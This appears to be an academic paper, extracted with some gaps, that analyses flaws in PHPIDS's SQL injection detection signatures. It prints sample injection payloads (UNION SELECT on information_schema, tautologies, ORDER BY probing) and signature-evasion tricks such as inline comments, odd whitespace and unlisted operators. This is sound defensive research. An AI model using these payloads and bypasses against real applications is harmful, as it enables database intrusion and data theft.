Signature-based systems have been extensively adopted as a security measure to address the cyber attacks in various
domains such as detecting intrusive activities on the cloud or network (Vaidya 2001; Roschke et al. 2009), identifying
internet worms (Tang et al. 2007), malware (Zheng et al. 2013), etc. Just like any other software, intrusion detection
systems are also associated with a number of defects and errors, therefore, they also need to be tested to ensure the
expected quality. The security experts assess these systems on various performance measures to verify their
effectiveness (Mel et al. 2003; Zanero 2007; Massicotte et al. 2012; Massicotte et al. 2015). Detection coverage is one
of the main testing parameters used to describe the capability of the system to prevent the attacks, and is also
considered as a primary goal in building an IDS. However, evaluating the detection coverage is quite a difficult task as
identifying a complete set of intrusion activities that might occur is not possible (Igure et al. 2008). In a study
(Puketza et al. 1996), the authors have tested non-functional requirements of the Network Security Monitor (NSM)
(Heberlein et al. 1990) on the basis of two more parameters, namely resource usage and resilience to stress. The
resource usage testing helps to evaluate the resources such as CPU time and memory space consumed by the IDS. If
the system is found to consume excessive resources, it might become impractical to deploy in a real environment.
Resilience testing helps to measure the ability of the system to withstand the stress conditions such as excessive
workload, abundant noise, etc. The IDS suffers through a unique problem, the “blind spots” that refer to the classes of
attack vectors missed by the detector. It is possible for an attacker to examine the design of IDS that are commercially
and openly available and identify the possible blind spots that might help them evade these systems. In the work
(Vigna et al. 2004), the authors proposed a framework to automatically generate variants of the attacks to identify
blind spots in the system and tested the detection capabilities of two well known network-based IDS, namely
RealSecure (Wassom 2003) and Snort (Roesch 1999).
198
Identification of Flaws in the Design of Signatures for Intrusion Detection Systems
The existing literature has mostly used a black-box approach to cross-examine a detection system in which the
performance is tested against a large set of attack vectors. However, the performance of the systems is highly driven by
the fact that the signatures have been structured very efficiently. Keeping this in mind, several researchers have
adopted the white-box approach and proposed techniques to perform structural analysis of the IDS signatures. For
example, the constant addition of new signatures in the database over time in order to cope with new vulnerabilities
and exploiting mechanisms often results in the generation of redundant signatures in the database. In a study
(Stakhanova et al. 2010), the authors have proposed an approach based on Non-deterministic Finite Automata (NFA)
to identify such signatures and resolve the semantic inconsistencies in the rules set of the IDS. In another study
(Massicotte et al. 2011), the authors attempt to identify the overlapped signatures in the signature database of Snort
IDS. Overlapped signatures refer to the signatures triggered simultaneously on the same group of attack vectors. The
authors in this study have used automata theory and set theory to characterize the signatures and identify overlaps
respectively. In the proposed work, the structure of the signatures has been analyzed to examine various factors such
as the contribution of an individual signature in the detection coverage, specificity and sensitivity in the signatures,
etc. Moreover, based on structural analysis, we identified a few more issues in the design of signatures besides
overlapping and redundancy, which are responsible for a poor quality signature set.
It is a well-known fact that for designing a quality signature set, the developer must acquire a profound knowledge of
the concerned domain. But gathering the knowledge would not be productive until we are focused and know the
significant details that are important from the signature design point of view. SQL injection signatures relate to the
attack vectors to be detected, and attack vectors are related to the programming elements of SQL. Although there
exists a plethora of literature on SQL technology and SQL-based attacks (Clarke-Salt 2009), in this section, we discuss
their concepts exclusively from the signature design point of view. Attackers mostly use unconventional ways to poison
the original SQL query in order to conduct unauthorized operations on the database. This section explains the
relationships that exist among SQL, its attack vectors and signatures, and highlights a number of peculiar points that
are important for designing the signatures. The presented knowledge will help a developer gain understanding and
make him aware of fine details he might ignore otherwise. The relationship can be realized by looking into the
following concepts.
An arbitrary input would not cause successful injection. An attack vector needs to be in a specific format in order to
produce the desired result. A number of techniques are being used to exploit SQLi vulnerabilities (Depren et al. 2005;
Bau et al. 2010) and each technique is associated with its respective set of attack vectors. For instance, the
tautology-based injection technique targets the „WHERE‟ clause of the query and injects the code to control the result
of the conditional parameter. The attack vectors using this technique make use of Boolean operators such as OR, AND,
||, &&, ^, etc. to infect the query. Below are some examples of queries modified by the tautology-based attack vectors.
199
Identification of Flaws in the Design of Signatures for Intrusion Detection Systems
If we closely look at the two operators, OR and || from the signature aspect, although these operators appear similar
from the operational perspective, they somewhat require different regular expressions to recognize them. The „OR‟
operator must be followed by certain special characters such as space (\s) and bracket (\(), which is not the
requirement of its symbolic operator „||‟. If the developer fails to understand such finer details, the result may be the
formation of poor signatures. For example, the regular expression, (?:(?:n?and|x?or|not|\|\||\&\&)\W+\w+) will fail
to detect last attack vector whereas the expression (?:(?:(\W+(n?and|x?or|not)\W+)|\|\||\&\&)\W*\w+) has the
potential to detect all three vectors. However, it is to be noted that detecting attack vectors should not be the sole
criteria of the signature. Special care should also be taken to ensure that the signature does not categorize benign input
as malicious. For example, the regular expression, (?:(?:n?and|x?or|not|\|\||\&\&)\W*\w+) is also capable of
detecting all of the attack vectors but it raises the risk of getting false positive rates as well. The signature will put all
the input containing „or‟ as substring into the suspicious list, such as projector, actor, preorder and so on.
Union-based exploitation is another injection technique that uses the „UNION‟ clause to join the forged query to the
original query. It allows the attacker to obtain the records of other tables. An instance of the query infected by the
attack code is given below.
• Select id, name from user_table where id = 1union select id, name from product_table
(?:union\W+select) seems a good expression to detect such attack vectors. But since a union clause can also be
followed by “all/distinct/distinctrow” predicates, it allows the attackers a wide option to fool the signature.
The two injection techniques discussed above show what exact knowledge a developer should have about the structure
of attack vectors for formulating the rules. A small mistake in the knowledge domain will lead to the creation of a
signature with holes and allow the attacker to launch the attack.
SQL is supported by a number of Relational Database Management Systems (RDBMSs) including MySQL, Microsoft
SQL Server and ORACLE. Although all of them implement the same SQL syntax, there are certain differences in terms
of SQL query code and supported keywords. Here, we highlight some of the differences that exist between MySQL and
SQL Server. The two code snippets below demonstrate the syntactic variation between their queries. In the case of SQL
Server, both of the following code snippets (1 and 2) are valid, whereas for MySQL, only the second snippet works.
2. insert into abc values(1) (supported by both SQL Server and MySQL)
200
Identification of Flaws in the Design of Signatures for Intrusion Detection Systems
Due to these minor syntactic variations, there is a high possibility that the signatures created for one database system
would fail to detect attack vectors for another database system. Following are two regular expressions. The signature
expression, (?:insert\W+\w) will recognize both the code snippets in user input as the attack vectors whereas (?:insert
into\W+\w) expression will fail to detect first snippet in the input.
Besides syntactic differences, the list of supported SQL keywords and operators also vary in different database
systems. For example, the „LIMIT‟ clause, which is not part of standard SQL, is supported as a vendor extension by
MySQL while SQL server uses the „TOP‟ clause to perform a similar operation.
As for another example, MySQL supports both the operators, double dash (--) or hash (#) to add an inline comment in
the query whereas SQL Server supports only double dash (--) to place the comment.
• Select* from abc where id =1 or 1=1 -- hhh (supported by both, MySQL and SQL Server)
The attack vectors are tailored according to the underlying database, and since it is highly likely that signatures that
are working fine for one database may fail in detecting attacks for another database, a developer should be aware of
these DBMS variations before formulating the rules.
Attack vectors are intended to attain one of the three following objectives: to perform unauthorized operations on the
server, raise logical error message and probe the web application. In order to perform unauthorized operations, the
attacker has to craft malicious string intelligently. For example, consider the modified query, select id, name from
user_tbl where id = 1 union select table_name, column_name from information_schema.columns. The query has
been wisely tailored by the attacker so as to retrieve the list of all the tables stored in the database along with their
column names. But before crafting such attack strings, the attacker first needs to know the structure of the underlying
query. The attacker can get help from logical error messages generated by the server to serve the purpose, which is also
the second intention of attack vectors. It usually helps the attacker gain information about the structure of the
database or query. The attack vectors again should follow a strict format so as to raise a logical error message. For
example, the attacker may use the „order‟ clause and run the following sequence of queries to determine the number
of columns.
201
Identification of Flaws in the Design of Signatures for Intrusion Detection Systems
The server will execute the first two queries but raise an error in the third case, which provides the clue to the attacker
that there are 2 columns. Probing is the third intention of the attack vectors, which is basically used to determine
whether the web application is vulnerable to injection attacks. The inverted comma is mostly used to discover whether
the application is vulnerable. If the infected query causes the database server to raise a syntax error, the underlying
web application is supposed to be exposed to SQL injections. For example, the following syntax error message is
generated by a MySQL server.
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB
server version for the right syntax to use near '"' at line 1
The most important fact of the attack vectors used for probing the application is that they are not required to follow a
rigid structure. A simple mistake in the spelling of a SQL clause may also cause the server to generate a syntax error.
For example:
Since attack strings for serving the first two objectives must obey a specific format, the efficient signatures can be
designed to capture such format in order to detect attacks. On the other hand, for covering the attack vectors used for
probing, a signature needs to be highly generic in nature, which might put the detection system at the risk of a greater
number of false positive alarms. An alternative approach could be to design a signature that inspects the output
generated by the server (HTTP response) since the error generated by the database is mostly the same.
The tampering schemes are particularly used by the attacker to evade the detection rules of the system. Attackers have
a number of options to tamper with the SQL attack vectors. Encoding techniques, such as URL encoding, Base64
encoding, Unicode encoding, etc., are the most common methods used to bypass SIDS. Case changing is another
technique that will work effectively if the designed signatures are not case resistant. For instance, the regular
expression (?:union\s+select) will fail to detect the attack payload containing “Union sElect” as a substring. The
attacker may also play with white-spaces to bypass the rules. For example, the regular expression (?:union\s+select)
will fail to detect the attack payload containing the string “union%A0select” where %A0 represents the non-breaking
space character. Similarly, the space-sensitive regular expressions (e.g. (?:union\sselect)) will fail to detect the attack
payload with irregular spacing in the content (e.g. union%20%20select).
The tampering problems can be handled by pre-processing functions that convert the input into a standard format
before applying the detection rules, such as making all characters lowercase, removing extra whitespaces, decoding it
into the same value, etc. It significantly lowers the burden on the signatures in terms of complexity and also enhances
202
Identification of Flaws in the Design of Signatures for Intrusion Detection Systems
the performance of the system. However, there are some sophisticated tampering schemes that cannot be handled by
pre-processing routines. Adding comments within the attack vectors is one of the notorious ways used by attackers to
fool the signatures. For instance, the signature (?:union\s+select) can be bypassed using “union/**/select” or “union
/*!select*/” in the attack vectors. Therefore, the developer is required to know which of the tampering schemes cannot
be handled by pre-processing techniques and must be dealt with signatures.
In this section, we discussed the key points to be focused on while attaining the knowledge of the domain with respect
to designing signatures for intrusion detection. The points are briefly summarized as:
• Each injection technique is associated with its set of attack vectors whose structure peculiarities need to be
studied sincerely and rigorously.
• There exist significant differences among various database systems in terms of syntax and supported keywords
that might make the signatures designed for one system perform poorly in another.
• It is shown that signatures cannot be created for every attack vector, else it would result in extremely generic
signatures, which would in turn increase the number of false positive alerts.
• Tampering schemes have also been discussed where it is observed that some of them can be handled at the
preprocessing side while some need to be handled exclusively by the signatures.
In the next section, we conducted a case study to analyze the quality of a signature set of PHPIDS, a well known
signature-based intrusion detection system for web application attacks.
4. Case Study
The performance of SIDS relies strongly on the quality of the designed signatures. A good signature is generally the
one that keeps a proper balance between the sensitivity and specificity level. We conducted an experiment on the
PHPIDS tool - a PHP-based Intrusion Detection System to assess the quality of its signatures. The tool provides over
2,500 attack signatures for guarding PHP applications against different categories of web attacks such as XSS, SQLi,
directory traversal, etc. In the experiment, we considered only those signatures designed to detect SQL injections. We
assessed the detection tool based on the following parameters:
• The contribution of individual signatures in the detection mechanism to determine its worthiness in the
detector
203
Identification of Flaws in the Design of Signatures for Intrusion Detection Systems
We employed the white-box testing methodology to carry out the evaluation procedure. We analyzed the structure of
each regular expression and designed five attack vectors per signature. The attack vector set was designed with the aim
to cover each signature in testing. The assumption behind the experiment is that highly generic signatures would also
detect those attack vectors in large numbers that were not designed for them, and highly specific signatures would
detect only its set of attack vectors.
In PHPIDS, the number of regular expressions for recognizing SQL attacks is over 100. However, the experiment was
conducted on 83 SQL injection signatures as we did not consider all of the signatures for the experiment. We
considered only those signatures in the experiment for which logical attack vectors can be designed, i.e. those vectors
that make a database server either execute the injected query successfully or display some semantic error message. In
PHPIDS, we found a number of signatures that will detect only those attack vectors that cause syntax errors. In section
3.3, we discussed that attack vectors causing syntax errors do not follow a rigid structure, and so are difficult to
capture by the regular expressions that verify input data. These vectors can be efficiently handled by designing the
signatures that inspect the HTTP response data. In order to evaluate the contribution of each signature, we created a
set of 415 attack vectors with five attack vectors per signature. Appendix 1 provides the list of signatures under
consideration along with their attack vectors. We developed a vulnerable web application, hosted it on the localhost
and integrated it with the PHPIDS tool. We used an iMacros-based script [12] to automate the process of sending
attack requests to the website. The graph given in Figure 1 shows the number of attack vectors detected by each
signature.
It is clearly visible from the graph that there are some signatures whose contribution is far higher than the rest. For
example, the signature, S7 itself detected 50.1% of attack vectors. Based on the contribution, the signatures are divided
into two sets, namely A and B. Set A contains signatures which contributed highly to the detection process. It has a
total of 10 signatures in the list as shown in Table 1. Set B contains the rest of the signatures, i.e. 73.
The first observation we made from the experiment is that the signatures listed in set A are generic in nature, and
thereby provide a broader detection coverage while signatures in set B are more restrictive. For example, consider the
signature, S79 (?:--[^\n]*$) from the set A and signature, S2 (?:"\s*(?:#|--|{)) from the set B. The former signature
looks for the presence of double-dash (--) in the input whereas the latter signature put an extra restriction on the input
and categorized it as suspicious if it contains, at a minimum, an inverted comma (“) followed by either hash (#) or
204
Identification of Flaws in the Design of Signatures for Intrusion Detection Systems
double-dash (--). The more restrictions we put in the rules, the more specific it becomes and the lesser detection
coverage it provides.
S7 (?:(?:^["\\]*(?:[\d"]+|[^"]+"))+\s*(?:n?and|x?or|not|\|\||\&\&)\s*[\w"[+&!@(),.-])
S15 (?:"[\s\d]*[^\w\s]+\W*\d\W*.*["\d])
S19 (?:union\s*(?:all|distinct|[(!@]*)?\s*[([]*\s*select)
S35 (?:"\s*[^?\w\s=.,;)(]+\s*[(@"]*\s*\w+\W+\w)
S44 (?:^[\W\d]+\s*(?:union|select|create|rename|truncate|load|alter|delete|update|insert|desc))
S72 (?:;?\s*(?:select|union|having)\s*[^\s])
S77 (?:\Wselect.+\W*from)
S79 (?:--[^\n]*$)
S81 (?:[^*]\/\*|\*\/[^*])
S36 (?:select\s*[\[\]()\s\w\.,"-]+from)
In the next experiment, we compare the detection accuracy of the two sets individually on the same set of attack
vectors. Figure 2 shows the detection statistics of the two sets with the help of a Venn diagram. We observed that the
set A, which consists of just 10 signatures, detected 386 attack vectors out of 415, whereas set B, which has 73
signatures, detected 384 attack vectors. It implies that the signatures in set A are extremely sensitive as they are
providing sufficient detection coverage to PHPIDS with only 10 signatures and capable of offering detection accuracy
comparable to set B. Moreover, 7.5% of attack vectors are exclusively detected by set A, which also shows the
significance of these signatures in PHPIDS. It is to be noted that although the generic signatures provide broader
detection coverage, they also increase the risk of false positive alarms. For example, signatures (S44 and S72) merely
look for keywords such as “union”, “select”, “create”, etc. in the input string without imposing a restriction on the
structure of the input where they have been used. Since these words are common in layman language, there are higher
chances that benign input will also be categorized as suspicious.
205
Identification of Flaws in the Design of Signatures for Intrusion Detection Systems
The second observation from the experiment is that 85.5% of attack vectors are detected by both the sets. After
carefully assessing structure of the signatures from both sets, it is found that the generic signatures in the set A
s u p e r s e d e d m o s t o f t h e s i g n a t u r e s o f t h e s e t B . F o r e x a m p l e , c o n s i d e r t h e s i g n a t u r e S72
(?:;?\s*(?:select|union|having)\s*[^\s]). The minimum requirement for an input to trigger the signature is that it
contains words “select”, “union” or “having” as a substring. Some of the signatures of the set B superseded by S72 are
shown in Table 2. It implies that the presence of such generic signatures in the detection system highly questions the
existence of the superseded signatures by making them obsolete.
S38 (?:in\s*\(+\s*select)
S49 (?:@.+=\s*\(\s*select)
S55 (?:\(\s*select\s*\w+\s*\()
The third observation drawn from the experiment is that 6.9% of attack vectors are particularly recognized by the
signatures in set B. It is to be remembered that signatures in set B are specific whereas signatures in set A are generic.
We found two main reasons why the generic signatures of set A could not handle these attack vectors. The first reason
says that generic signatures are also not completely designed to capture all the variations that an attacker can use in a
vector. For example, consider the signature S7
(?:(?:^["\\]*(?:[\d"]+|[^"]+"))+\s*(?:n?and|x?or|not|\|\||\&\&)\s*[\w"[+&!@(),.-]). The signature is crafted to
206
Identification of Flaws in the Design of Signatures for Intrusion Detection Systems
detect logic operators in the attack payload, namely nand, and, xor, or, not, || and &&, and ignored the two least used
operators in its rule, “^” and “|”. It gives the attacker an open passage to attack the application without going detected
by the generic signature as given in the following examples.
The second reason is that set A does not contain a generic signature for every class of attack vectors. For example,
there is not a generic signature in the set A with the “group by” clause, and therefore, the attack vector,
1%20group%20by%20(2) is detected by the signature S51 (?:\d\s+group\s+by.+\() of set B only. Moreover, the attack
category missed by the generic signatures provided us a clue to identify possible blind spots in the IDS as the
non-generic signatures of set B are both susceptible and insufficient. The fourth observation records that there are
plenty of attack vectors for which there are no signatures in the detection system. In table 3, we listed some of the
susceptible signatures of the PHPIDS that let the attackers penetrate into the application. The section of the attack
vectors responsible for bypassing the signatures has been highlighted in the table.
Table 3. Examples of attack vectors bypassed by IDS due to the incapability of the signatures
207
Identification of Flaws in the Design of Signatures for Intrusion Detection Systems
The case study of the signatures of PHPIDS tool entailed various significant observations about the quality of its
signature set. In the next section, we discuss the flaws in the design of the signatures based on the identified issues.
In the previous section, we assessed the structure of signatures of the PHPIDS tool and identified various flaws in their
design that yielded weak signatures and deteriorated the performance of SIDS. Based on the flaws in the signature
designing practice, we divide the weak signatures into six categories, discussed as follows:
There are a set of operators in SQL that can be used in an attack vector in a similar way from the aspect of syntax.
Logical operators in SQL, such as AND, OR, and XOR, are basically used to determine whether a row should be
selected for the output and these operators can be used interchangeably in an attack vector to carry out an adversarial
operation. Some instances of the attack vectors which are logically the same from the attack perspective are shown
below:
• 1 xor 0
• 1 or 0
• 1 and 1
It implies that the rules designed for detecting one operator should be designed for other operators as well. A complete
signature would be one that incorporates all of the related operators in its rule. Therefore, a signature is called
incomplete if it specifies only some of the related operators in its rule. Mathematically, it can be defined as follows:
Definition 1: Let 𝑅𝑂𝑆𝑄𝐿 = { set of related operators in SQL }, 𝑆𝑡𝑅𝑜 = { 𝑅𝑂𝑆𝑄𝐿(1) ....𝑅𝑂𝑆𝑄𝐿(𝑚) } and 𝑆𝑂(𝑛)= { set
where i = 1 to m
The incomplete signature can easily be bypassed by using the 𝑅𝑂𝑆𝑄𝐿(𝑖) / 𝑆𝑂(𝑛) operators in the attack payload. For
example, let 𝑅𝑂𝑆𝑄𝐿(1) = {and, or, xor} and 𝑅𝑂𝑆𝑄𝐿(2) = {||,&&,^,|,&} are the two sets of related operators. Consider the
S6 signature, (?:"\s*or\s*"?\d). 𝑆𝑂(6)= {or}. The signature satisfies both the conditions of incomplete, i.e. 𝑅𝑂𝑆𝑄𝐿 (1) ∩
𝑆𝑂(6) ≠ 𝜙 𝑎𝑛𝑑 𝑅𝑂𝑆𝑄𝐿 (1) ⊄ 𝑆𝑂(6) . Since the signature is incomplete, an attacker can evade the rule by using “AND” or
“XOR” in the vector. Consider the S5 signature (?:(?:(n?and|x?or|not)\s+|\|\||\&\&)\s*\w+\(). 𝑆𝑂(5)= {nand, and,
or, xor, not, ||, &&}. The signature does not fulfill the conditions of the definition with respect to set, 𝑅𝑂𝑆𝑄𝐿(1) , since 𝑅
208
Identification of Flaws in the Design of Signatures for Intrusion Detection Systems
𝑂𝑆𝑄𝐿 (1) ⊂ 𝑆𝑂(5). But, the signature does satisfy the criteria with the set, 𝑅𝑂𝑆𝑄𝐿(2) as 𝑅𝑂𝑆𝑄𝐿 (2) ∩ 𝑆𝑂(5) ≠ 𝜙 𝑎𝑛𝑑 𝑅𝑂𝑆𝑄𝐿 (2)
The presence of incomplete signatures may create loopholes in the detection system. In section 4, we discussed that
some attack vectors managed to even bypass the IDS because of the incomplete design of the generic signature, S7. The
signature ignored the three operators (|, & and ^) in the regular expression, which provided a clear cut open gate to
the hackers to enter into the database without being recognized. Therefore, it becomes important to assess the
structure of the signatures to determine whether the signature developer specified all of the related operators in the
rules. The completeness in the rules set makes the signatures efficient by enhancing their capabilities to detect variants
of the attack vector.
In section 3.3, we discussed the fact that from the perspective of intention of the attacker, a query can be modified by
attack vectors to carry out one of the three objectives, i.e. to make the database server successfully execute the query,
to make it generate a semantic error or to make it raise a syntax error. We also observed that the attack vectors causing
syntax errors are not restricted to a particular structure, and so make it extremely difficult to design a rule for
detecting them. These attacks can be best handled by designing the rule that inspects the response generated by the
server.
In the irrelevant category, we put all those signatures in the list for which no logical attack vectors can be designed.
Logical attack vectors imply that these are executed as part of the SQL code in a manner that either an unauthorized
operation is performed on the database or a logical error message is displayed to the attacker. The signature is termed
irrelevant for two reasons. First, the signature does not detect any logical vectors. Second, these signatures are not
intentionally designed to detect the illogical attack vectors (attack vectors causing syntax errors). It is due to a flaw in
the design of the signature that makes it lose its significance in the detector. Mathematically, irrelevant signatures can
be defined as follows:
Definition 2: Let 𝐿𝑎 = { set of logical attack vectors} and 𝑆𝑎(𝑛) = { set of attack vectors detected by 𝑆(𝑛) }. A
signature is irrelevant iff 𝐿𝑎 ∩ 𝑆𝑎(𝑛) = 𝜙. The condition is graphically represented in the form of a Venn diagram in the
following figure.
Fig.3 Relation between the logical attack vectors and the vectors detected by irrelevant signatures
209
Identification of Flaws in the Design of Signatures for Intrusion Detection Systems
Consider an irrelevant signature (?:"[\s\d]+=\s*\d) of the PHPIDS. In order to understand the flaw in the design of
the signature, let us split the regular expression into two parts, i.e. (“) and ([\s\d]+=\s*\d). Double-quotes (“) in the
SQL injection vector either marks the end of string literal or beginning of the string literal. In the former case, it must
be followed by some SQL operators such as logical operators (OR, AND, ||, etc.) and query operators (UNION, IN,
etc.). But the regular expression does not provide any space for such operators, and so makes the construction of a
logical attack vector nearly impossible. In the latter case, if double-quote marks the beginning of the string then
everything followed by it until the next occurrence of double-quote will be treated as a string literal. The value of the
string literal does not matter in the attack vector and has a range equal to [\W\w]*, therefore the second part of the
regular expression loses its significance and does not make any sense. Let's take another example of the irrelevant
signature, (?:"\s+and\s*=\W) of the detector. In this signature, the problem lies in the sub-expression (and\s*=) that
demands the attack vector to use “AND” clause followed by “EQUAL” operator (=) with optional spaces. The “AND”
clause needs a predicate that evaluates to either 0 or some non zero value, and the “EQUAL” operator must have
operands on both the left-hand side and right-hand side. But the expression does not allow anything between “AND”
and “=”, thereby, no logical attack vector can satisfy such expression.
The signature became irrelevant mainly because of the error in the implementation of the rule by the designer. The
designer should test the designed signatures to determine if the rules are implemented in the same way as intended.
Since no logical attack vector can satisfy these rules, it is highly unlikely that these signatures will ever be triggered in
the monitoring process. Furthermore, irrelevant signatures unnecessarily increase the size of the signature set, which
in turn increases the processing requirement of the detector to verify a request. Since the experiment is conducted on
the signatures for which logical attack vectors can be designed, the irrelevant signatures are not listed in Appendix A.
A single signature is generally built upon multiple criteria in order to verify the input from several perspectives. For
instance, the S12 signature, (?:\Winformation_schema|table_name\W) looks for either “INFORMATION_SCHEMA”
or “TABLE_NAME” as suspicious keywords in the user payload to recognize SQL injection. It implies that the quality
of a signature can get degraded if the individual sub-rules are not thoroughly implemented. Semi-relevant signatures
are those signatures in which at least one of the sub-rules is not relevant. We define the semi-relevant signature as
follows:
Definition 3: Let 𝑆𝑆(𝑛) be the set of sub-signatures of 𝑆(𝑛), i.e. 𝑆𝑆(𝑛) = { 𝑠𝑆(1,𝑛)....... 𝑠𝑆(𝑚,𝑛)} where m denotes the
total number of sub-signatures in 𝑆(𝑛). Let 𝑠𝑆𝑎(𝑖,𝑛) = { set of attack vectors detected by ith sub-signature of 𝑆(𝑛) }. A
Consider the signature S52, (?:(?:;|#|--)\s*(?:drop|alter)). The signature can be split into parts, (?:;|#|--) and
(?:drop|alter). The first part, (?:;|#|--) consists of three options while the second part, (?:drop|alter) comprises two
210
Identification of Flaws in the Design of Signatures for Intrusion Detection Systems
options, therefore the whole signature is composed of six (3x2) criteria, which are as follows: (?:(?:;)\s*(?:drop)),
(?:(?:;)\s*(?:alter)), (?:(?:#)\s*(?:drop)), (?:(?:#)\s*(?:alter)), (?:(?:--)\s*(?:drop)) and (?:(?:--)\s*(?:alter)). The
last four criteria are not conceptually valid as the database server is supposed to ignore the content of the line after the
comment operator. Therefore, the attacker cannot issue the drop or alter command after placing the comment
operator. The same issue lies with the S53 signature, (?:;|#|--)\s*(?:update|insert)\s*\w{2,}) which is looking for
update and insert operations preceded by the comment operator. One more example of the semi-relevant signature is
S83, (?:";\s*(?:if|while|begin)). This signature has one irrelevant sub-rule, (?:";\s*(?:while)) that will be triggered for
the vectors that use the “WHILE” clause after the semicolon (;) operator. Semicolon is basically used by the attacker to
conduct stack query operations and no valid SQL query can begin directly with a “WHILE” clause. It implies that the
attack vector satisfying this sub-rule will not be logically valid and would only make the database server raise a syntax
error.
Semi-relevant signatures are mainly formed due to the mistake of the developer in associating the SQL keywords or
operators with one another in a similar manner that possess different contexts. In signature S52, the rule deals with a
semicolon (;) and comment operators (#,--) in a similar manner, whereas the semicolon is basically used to invoke
stacked query operations and comment operators are used to make the query ignore certain content. Therefore,
assessing the quality of sub-rules of a signature would help in generating a more efficient signature set for the detector.
There is one big difference between the normal query and the attack query, the latter tries to use unconventional ways
to achieve their target in order to bypass the signatures. So, if the developer is not thoroughly aware about the attacker
strategies and tactics, and formulates the signature based on the knowledge of commonly used queries, it may
ultimately allow the hacker to subvert the detection mechanism. The simplest way to bypass the regular expression is
by using special characters, such as whitespaces and brackets, in the attack payload. The beauty of these characters is
that they can be used in the payload unrestrictedly, which implies that if the developer puts a restriction on the
number of occurrences of these characters in the signature, the attacker can easily bypass the expression. We call those
signatures susceptible signatures. For example, consider the S63 signature,
(?:;\s*(?:select|create|rename|truncate|load|alter|delete|update|insert|desc)\s*[\[(]?\w{2,}). The sub-expression
“[\[\(]?” makes the regular expression susceptible to an attack vector. The attack vector can use the parentheses
multiple times while the regular expression explicitly restricts its use to either 0 or 1 time. It means, the attacker can
bypass the signature by using the character “(“ more than 1 time, as follows:
211
Identification of Flaws in the Design of Signatures for Intrusion Detection Systems
Similarly, the S68 signature, (?:waitfor\s*delay\s?"+\s?\d) is also vulnerable to attacks. The sub-expression “\s?” in
the signature allows the attacker to evade it by using more than one space in the attack vector.
The susceptibility in the signatures is also one of the reasons for getting false negative rates by the detector. It is
usually caused by placing a limitation on the characters in the rule that can be used indefinitely in the attack vector. In
order to design good signatures, a developer must need to think from an attacker point of view and be aware of the
different ways that can be used to bypass a rule.
Redundant refers to the same. While designing the signature, it is also likely that there are two signatures such that
one is the specific version of another signature. It means detection coverage provided by the specific one would be the
subset of another. Therefore, we call the signature redundant if the set of attack vectors detected by it is included in
the set of attack vectors detected by some other signature of the IDS.
Definition 4: Let S = { set of signatures in IDS } and 𝑆𝑎(𝑛) = { set of attack vectors detected by 𝑆(𝑛) }. A signature𝑆(𝑛
In section 4, we observed the existence of signatures that are generic in nature and supersede the major section of the
signatures, making all of them redundant. Besides the generic signatures, we also observed several signatures of the
set B, which form the superset. Let's take the example of two signatures from the set B, S26 (?:"\s*like\W+) and S32
(?:"\s*like\W*["\d]). S32 is the more specific version of S26 since S26 is capable of detecting all the attack vectors that
will be detected by signature S32. However, in IDS, the number of signatures affects the performance of the system.
The higher the number of signatures, the more processing time is required to determine if the input is benign or
malicious. Thereby, each signature should have significance in the system and contribute to the detection coverage.
The signature set will be optimum if there is no redundancy among their signatures. Redundant signatures only
increase the size of the set and add no novel functionality to the detection system. Elimination of those signatures will
help in reducing the size of the signature set.
The IDS contains various pre-processing and pre-filter routines for enhancing the efficiency of the system. The
signature’s rules are applied on the processed input to verify if it is malicious or not. If the rules were designed on the
basis of raw input, it is possible that rules will yield an unexpected result or even allow the attack vectors to go through
the IDS. While assessing the signatures of PHPIDS, we observed that there are attack vectors which can bypass the
212
Identification of Flaws in the Design of Signatures for Intrusion Detection Systems
detector even if the right signature is there to detect them. A signature is termed inconsistent if they pass some of the
attack vectors despite having the capability to detect them.
Definition 5: Let 𝐼𝐷𝑆′𝑎 = { set of attack vectors bypassed by IDS } and 𝑆𝑎(𝑛) = { set of attack vectors detected by𝑆(𝑛)
For example, the attack vector, (1)or (5|"1") is converted to (1)or (5|1) by one of the normalizing functions of the IDS
which makes the associated signature S8, (?:[^\w\s]\w+\s*[|-]\s*"\s*\w) helpless to detect it. The pre-filtration
policies are also found to be the reason for reducing the detection accuracy of the signatures. To increase the
performance of PHPIDS, only those requests are passed to rule set whose value is not alphanumeric. Although the
filter function is implemented to avoid verifying unnecessary requests but there are attack vectors which do not
contain any special characters. The attack vectors, 1 or @user or 1 and 1 or 1 having 1 goes undetected in the presence
of potential signatures, S9 ((?:@\w+\s+(and|or)\s*["\d]+)) and S75 (?:\W+\d*\s*having\s*[^\s\-]) respectively.
Inconsistency is basically the weakness in the signature which caused by the lack of coordination between IDS policies
and the signatures. It reduces the detection capability of the designed signatures and increases the number of false
positive alarms. Table 4 summarizes the categories of weak signatures.
213
Identification of Flaws in the Design of Signatures for Intrusion Detection Systems
214
Identification of Flaws in the Design of Signatures for Intrusion Detection Systems
6. Conclusion
The performance of the signature-based systems is strongly dependent on the quality of the signature database. Since
these signatures are mostly created by the security experts, the quality of the signatures has a strong dependency on
the knowledge extent of the expert about the attack domain, and how precisely the patterns of the attacks are captured
and implemented. The paper first discussed the four key points of the attack domain of the SQL injection, namely
structure of attack strings, DBMS variations, the intention of attack vectors and tampering schemes in order to
highlight various peculiar and significant details that might be ignored by the developer while designing the
signatures. The paper also conducted an experiment on PHPIDS for evaluating the quality of its signature set. The
experiment revealed various pitfalls in the signature set such as the presence of generic and susceptible signatures,
blind spots, etc. It is observed that contribution scale of individual signatures is highly imbalanced as some signatures
are triggered so frequent in the detector. These signatures are found to be extremely generic in nature, capable of
detecting a large section of attack vectors. These generic signatures are found to be so sensitive that they put the
system at the risk of high false positive rates. Moreover, these signatures made most of the signatures of the detection
system obsolete by providing a superset of the detection coverage. However, the experiment also clearly showed the
importance of such generic signatures in the detection system since the non-generic signatures are found to be
susceptible and insufficient to deal with the attack vectors. The experiment also revealed the presence of possible blind
spots in the detector by identifying the class of attack vectors missed by the generic signatures.
Based on the case study, we identified various potential reasons behind the poorly designed signatures. The weak
signatures are divided into six categories, namely incomplete, irrelevant, semi-relevant, susceptible, redundant and
inconsistent. These weaknesses are, however, not limited to the SQL injection signatures rather they are applicable to
any of the attack class signatures such as XSS, path traversal and network attacks. The flaws will assist the developers
in creating efficient signatures for the detector by making them aware of the common poor signature designing
practices. Moreover, security experts may use these flaws to assess the detector by conducting structural analysis on its
signature set from a number of perspectives. The mathematical definitions of the types of weak signatures will help to
automate the process of analyzing the structure of the rules to a great extent.
215
Identification of Flaws in the Design of Signatures for Intrusion Detection Systems
References:
1. Almgren, M., Debar, H., & Dacier, M. (2000, February). A Lightweight Tool for Detecting
